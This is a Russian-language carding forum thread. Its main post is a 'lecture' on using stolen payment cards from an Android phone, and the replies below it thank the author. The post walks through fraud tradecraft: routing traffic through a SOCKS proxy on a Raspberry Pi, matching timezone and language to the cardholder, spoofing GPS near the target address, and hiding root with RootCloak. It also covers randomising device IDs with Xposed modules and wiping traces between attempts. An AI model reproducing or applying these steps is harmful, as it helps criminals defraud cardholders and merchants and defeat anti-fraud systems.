Если вы уже подключили носок (сокс, туннель, не важно) в Raspberry, подключились к нему по WIFI сети с мобильного, то идем на whoer.net, смотрим какой часовой пояс, идем в настройки, ставим часовой пояс и язык под холдера

Потом в location cheater задаем координаты, я обычно ставлю в пару метров от нужного адреса (под айпи или шип)

идем опять на whoer.net, и смотрим все ли нормально поставилось.

Что бы проверить работает ли location cheater или нет, скачиваем гугл карты, и там смотрим (нажать на кнопку мое местоположение)

Если все работает то скачиваем нужное приложение. Потом открывает root cloack, заходим в первый раздел (добавить\удалить приложение) и надимаем на плюсик, и ищем наше приложение, после этого что бы сохранить настройки заходим xposed installer, раздел фреймворк, и нажимаем быстрая перезагрузка. После этого даже если вы удалите приложение, его запомнит root cloak и делать этого каждый раз не нужно

После вбива, что бы начать следующий, нужно зайти в device id changer, в первом разделе device id нажать random all и apply, затем зайти в xposed installer раздел фрейворк , и нажать быстрая перезагрузка, тобы железо поменялось.

И так собственно мы научились подменять данные, железо, местоположение и так далее. Теперь заново ставим приложение и вбиваем, не забываем менять данные в xprivacy. Если надо условно бить палку перебором и что бы каждый раз не качать приложение, не регать гугл акк что очень напрягает, юзаем сайт apkpure.com, там можно скачать приложение и добавить его на телефон

То есть как отработали акк, удалили, поменяли данные, перезагрузили устройство, просто устанавливаете приложение заново

Теперт перейдем к вбиву с браузера

Здесь все намного проще, в целом любая версия андроида подходит для работы

Для вбива нам необходимо:

1) Сам браузер ( chrome, firefox, родной браузер телефона и тд)

2) ссleaner (или менеджер приложений есть априори на каждом андроиде)

3) proxy droid (в случаи необходимости, если вы не используете Raspberry).

4) DNS Forwarder

5) Location cheater (браузеры в целом запрашивают gps данные, имеет смысл координаты подменить под ip)

В случаи работы с браузером, железо менять не обязательно, но переустанавливать браузер желательно, и чистить его. Вбив почти такой же как и с приложения, просто пропускаем пункты с device id changer/root cloak/xprivacy.

В основном бьют с моззилы (так ак там webrtc отключается так же как и на компе), либо с родного браузера (на новых версиях андроида - редкость)

Чистим кэш (и историю) через ccleaner или менеджер приложений после каждого вбива обязательно

В целом на сегдня все. Надеюсь лекция была полезна для каждого из вас, и все вы пришли сюда не просто почитать информацию. но и планируете работать.
 
Последнее редактирование:

Crypt91

Постоянный участник
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

Crypt91

Постоянный участник
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Июн 2018
Сообщения
195
Симпатии
176
eRUB
1,993
#3
Давно эту лекцию ждал))) +++++ Огромный
 

Will Smith

Новичок

Will Smith

Новичок
Регистрация
26 Янв 2019
Сообщения
3
Симпатии
1
eRUB
249
#4
Замечательный подгон. Спасибо xD

Очень полезно тем кто хочет бить с телефонов.
 

AudiA6

Арбитр
АРБИТРАЖ

AudiA6

Арбитр
АРБИТРАЖ
Регистрация
4 Июн 2018
Сообщения
27
Симпатии
23
eRUB
1,407
#5
Сори но я сам не знал где ее читать буду) Вышло недопонимание с членом АГ, он мне дал ссылку на чат (я так понял общий чат Скайзона), и сделал там объявление о лекции. Я как бы понял что будет отдельный какой-то чат для проведения лекции. Чата нету и нету, пишу ему, а он говорит типа дал же мне чат где проводить, ну я и перенес на попозже, не поняли друг друга.
 
Сверху Снизу